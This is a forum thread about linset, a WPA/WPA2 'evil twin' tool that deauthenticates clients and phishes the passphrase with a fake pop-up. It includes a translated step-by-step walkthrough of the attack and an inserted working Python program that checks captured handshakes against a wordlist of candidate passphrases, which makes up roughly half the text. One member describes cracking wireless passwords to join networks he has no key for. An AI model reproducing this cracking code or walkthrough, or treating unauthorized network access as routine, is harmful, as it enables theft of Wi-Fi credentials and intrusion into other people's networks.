WPA crack NON-BRUTEFORCE!
So I ran across a new (2014 release) WPA cracking tool called linset for Kali. It does not use brute-force techniques to crack WPA; it has a very interesting way of capturing the handshake.
The problem is that I believe it was originally written in Spanish. Has anyone played with this, or have a good English tutorial to follow?
Here is some general info on it if anyone is interested:
http://www.google.com/url?url=http://black-hat-sec.org/index.php%3Ftopic%3D87.0&rct=j&frm=1&q=&esrc=s&sa=U&ei=XumvVOCBBYysyASUv4HQBg&ved=0CCgQFjAE&usg=AFQjCNH-8W6xpJ8kzcJLJi-LDIyYw6bDJg
https://www.youtube.com/watch?v=dBDDKTbGpgE
Comments
-
the_Grinch Member Posts: 4,165
Pretty interesting, I'm surprised the community hasn't come together and translated it to English.
WIP: PHP, Kotlin, Intro to Discrete Math, Programming Languages, Work stuff
-
zoro_2009 Member Posts: 26
I understand Arabic, if anyone is interested in the YouTube video!
-
the_Grinch Member Posts: 4,165
zoro_2009, translate it man, I'm sure a lot of people will appreciate it, and if you do a video with voiceover you'll probably get a ton of hits on YouTube.
-
Cyberscum Member Posts: 795
the_Grinch wrote: »Pretty interesting, I'm surprised the community hasn't come together and translated it to English.
They might have, I just can't find anything... I want to really try this out.
-
ryanw4130 Member Posts: 18
I am curious, is it for WPA, but not for WPA2? As far as I know, WPA2 has not been cracked? Sorry for the rookie question here. lol
-
Cyberscum Member Posts: 795
ryanw4130 wrote: »I am curious, is it for WPA, but not for WPA2? As far as I know, WPA2 has not been cracked? Sorry for the rookie question here. lol
Define what you mean by "WPA2 has not been cracked" (AES?... It has).
Linset can be used on WPA/2.
It is not a traditional "crack" like you are thinking of... Oh, and Aircrack can do something "similar" to this using the "Evil Twin" method.
-
LeBroke Member Posts: 490
I'm assuming this is not resource intensive and can be run on a potato? If so, it'd be awesome.
-
zoro_2009 Member Posts: 26
Well, I looked at the video and there is nothing he says (no voiceover), and the text is nothing but an introduction to what linset is and what it does!
The rest of the video is only about the installation of Linset!
Then in the last seconds of the video, he says that he will make another video on how to configure and work with the tool!
-
jaywalker Member Posts: 90
From what I've understood and read so far, the handshake is captured through deauthentication of the client(s) (using the aircrack-ng suite). The "non brute force" part of the attack = getting those deauthed clients to connect to your evil twin, and hoping they'd be dumb enough to enter their login credentials on the fake login page.
My assumption is that if the victim does not enter any login information, the handshake cannot be 'checked' against the phished credentials.
Sources used:
Linset's GitHub page (English):
https://github.com/vk496/linset
LINSET 0.14 - WPA/2 Hack sin Fuerza Bruta (Spanish; "LINSET 0.14 - WPA/2 hack without brute force")
Similar to linset:
https://github.com/sophron/wifiphisher
Goals for 2015: ICND1 [], ICND2 []
:cheers:
A winner is you
-
ibn_shaddad Member Posts: 57
I found this:
"Explanation of the Linset tool for grabbing the wireless password - Wifislax distro - TECH-SECU security techniques"
It is in Arabic, so I will try my best at translating:
In the name of God, the Most Gracious, the Most Merciful.
The tool linset: this tool is considered very dangerous, where you can easily own its victims and the victim can't figure out what happened. It is one of the tools that come with the Wifislax distro.
The principle behind this tool is that it connects to the victim's rig and creates a fake network to deceive him, and pushes a pop-up message asking him to enter the pre-shared key one more time to continue the connection. It looks very much like the fake login pages, but this one is still unknown to WiFi users.
Note: to install the distro, click here.
To open the tool from Wifislax, we go to the main menu and choose Wifislax, then WPA, then linset, as shown in the following picture.
After opening, we will see a list of available interfaces; as you see we have wlan0, so we choose number 1.
Now another screen; also choose 1 and continue.
Then a new screen, and it will start searching for nearby networks.
After finishing, it will show all the nearby networks, each with a number as you can see, and we can notice that a star is placed on every network that already has a user. Now choose the network number and press enter.
Now press 1 and enter.
Again 1 and enter.
Now here we wait for the tool to grab the handshake, and that is the goal; after we have it, close the window.
After closing the window, we will have the following screen; press 1 and continue.
Now a screen will show asking you to choose what language you want to use in the pop-up message the victim will see; choose what you want and continue.
The following screen will appear; just wait...
Good, now as we can notice in the following pic, it says "key found" and gives it to us.
Working on: CCNA R&S, CCNA Sec, Security+
Learning: Python, C and C++
-
ibn_shaddad Member Posts: 57
Are you sure we are not breaking any rules here by posting such things?
-
NovaHax Member Posts: 502
Nothing particularly ground-breaking here. Based on some Google Translate pages :-/ ... it looks like it still relies on a dictionary attack for cracking the EAPOL handshake. And an evil twin capture of the handshake is easy to do with airbase.
Wi-Fu - WPA2-PSK Evil Twin Attack
I did see a screenshot of what may be another option in LINSET that creates a fake access point (presumably with no encryption) and then forces anyone that connects to the attacker-hosted AP to web content that asks for a WPA/WPA2 key and then just strips it from the HTTP POST response (in clear text... thereby avoiding the need to crack the handshake), if the person is dumb enough to do it. It looks absolutely NOTHING like actual WPA authentication... but people are stupid... so I'm sure it still works frequently. But this is a social engineering attack; it's not a new technical crack. It's the technical equivalent of going up and asking someone what the passphrase is.
-
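The "check" jaywalker describes and the "dictionary attack for cracking the EAPOL handshake" NovaHax mentions are the same computation, so here is one worked example of it. This is an added example written for this page, not linset's own code (linset hands this step to aircrack-ng): it derives PMK, PTK and the KCK from a candidate passphrase and compares the MIC it produces with the MIC in the captured EAPOL message 2 of the 4-way handshake. A phished passphrase is simply a one-entry wordlist fed to the same check. The handshake, SSID, MAC addresses and nonces below are constructed for the example (no real capture); the only external reference is the PBKDF2 test vector from the IEEE 802.11 annex used in the usage note.

```python
"""WPA/WPA2-PSK handshake check: does a candidate passphrase reproduce the
captured MIC? Added example for this thread; not linset's or aircrack-ng's code."""
import hashlib
import hmac
import struct
from dataclasses import dataclass
from typing import Iterable, Optional

MIC_OFFSET = 81   # 802.1X header (4) + EAPOL-Key fields before the MIC (77)
MIC_LEN = 16


@dataclass
class Handshake:
    """What a cracker pulls from a capture: SSID, both MACs, both nonces and
    the raw EAPOL-Key message 2 (the first frame carrying a MIC)."""
    ssid: bytes
    ap_mac: bytes
    sta_mac: bytes
    anonce: bytes
    snonce: bytes
    eapol: bytes


def wpa_pmk(passphrase: str, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    Those 4096 iterations are the entire per-guess cost of WPA-PSK."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid, 4096, 32)


def wpa_kck(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces)).
    Its first 128 bits are the Key Confirmation Key that authenticates EAPOL frames."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4))[:64]
    return ptk[:16]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed. The low 3 bits of
    Key Information pick the algorithm: 1 = HMAC-MD5 (TKIP), 2 = HMAC-SHA1 (CCMP)."""
    version = struct.unpack(">H", eapol[5:7])[0] & 0x7
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * MIC_LEN + eapol[MIC_OFFSET + MIC_LEN:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if version == 2:
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]
    raise ValueError(f"key descriptor version {version} (3 = AES-CMAC) not handled here")


def check_candidate(hs: Handshake, passphrase: str) -> bool:
    """True iff `passphrase` reproduces the MIC captured in message 2."""
    if not 8 <= len(passphrase) <= 63:      # WPA-PSK passphrase length rule: skip impossible guesses
        return False
    kck = wpa_kck(wpa_pmk(passphrase, hs.ssid), hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)
    captured = hs.eapol[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    return hmac.compare_digest(eapol_mic(kck, hs.eapol), captured)


def first_match(hs: Handshake, candidates: Iterable[str]) -> Optional[str]:
    """Dictionary loop; a phished passphrase is a one-entry dictionary."""
    for candidate in candidates:
        if check_candidate(hs, candidate):
            return candidate
    return None


def build_message2(kck: bytes, snonce: bytes) -> bytes:
    """Constructed CCMP (descriptor version 2) EAPOL-Key message 2 with a valid MIC,
    built the way a real supplicant would (minus the RSN IE in the key-data field)."""
    key_info = 0x010A                                   # version 2 | pairwise | MIC present
    body = struct.pack(">BHHQ", 2, key_info, 0, 1)     # RSN descriptor, key info, key len, replay counter
    body += snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, key IV, RSC, key ID
    body += b"\x00" * MIC_LEN + struct.pack(">H", 0)             # MIC placeholder, key-data length
    frame = struct.pack(">BBH", 2, 3, len(body)) + body          # 802.1X v2, type 3 = EAPOL-Key
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + MIC_LEN:]


def constructed_handshake(passphrase: str) -> Handshake:
    """A handshake from a made-up network; every value here is constructed for the example."""
    ssid, ap_mac, sta_mac = b"CoffeeShopWiFi", bytes.fromhex("020000000001"), bytes.fromhex("020000000002")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    kck = wpa_kck(wpa_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    return Handshake(ssid, ap_mac, sta_mac, anonce, snonce, build_message2(kck, snonce))


if __name__ == "__main__":
    hs = constructed_handshake("espresso2014")
    # Candidates in the order a phishing portal might hand them over, wrong ones first.
    print(first_match(hs, ["password", "latte1234", "espresso2014"]))   # espresso2014
```

Two things worth taking from it. First, `wpa_pmk("password", b"IEEE")` must start with `f42c6fc5` (the PBKDF2 vector from the IEEE 802.11 annex); if that check fails, nothing downstream can be trusted. Second, the cost of one guess is one PBKDF2 of 4096 iterations plus a few HMACs, which is why verifying a single phished string is instant even on weak hardware, and why the same loop over a large wordlist is the "dictionary attack" NovaHax refers to.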
Deathmage Banned Posts: 2,496
I use Aircrack all the time; it comes in handy sometimes when I want to connect to wireless but I don't know the password. I just power on VMware Workstation on my laptop, spin up Ubuntu, run the program and wait like 10 minutes. You'd be surprised how simple most wireless passwords are...
I used to do aircrack back in college for clients to gauge how strong their wireless password was and to teach them how to make it stronger and harder to crack. I was a whitehat well before I even knew what the term meant...
Whitehat hacking is something I've always wanted to do; I'm just too busy getting into a niche of system administration, since to me that's where the money is, but I'm sure security-focused hackers make good moolah... someday.
-
lsud00d Member Posts: 1,571
ibn_shaddad wrote: »are you sure we are not breaking any rules here by posting such things?
As long as everyone understands this is for research purposes only and not used for nefarious reasons, then there is no problem having a scholarly discussion on cracking WiFi.
Also, I lol'd at LINSET's name... taking a page from GNU.
-
VIDEODROME Member Posts: 30
I've heard some programs work by exploiting WPS rather than cracking the password. I wonder if this is something like that.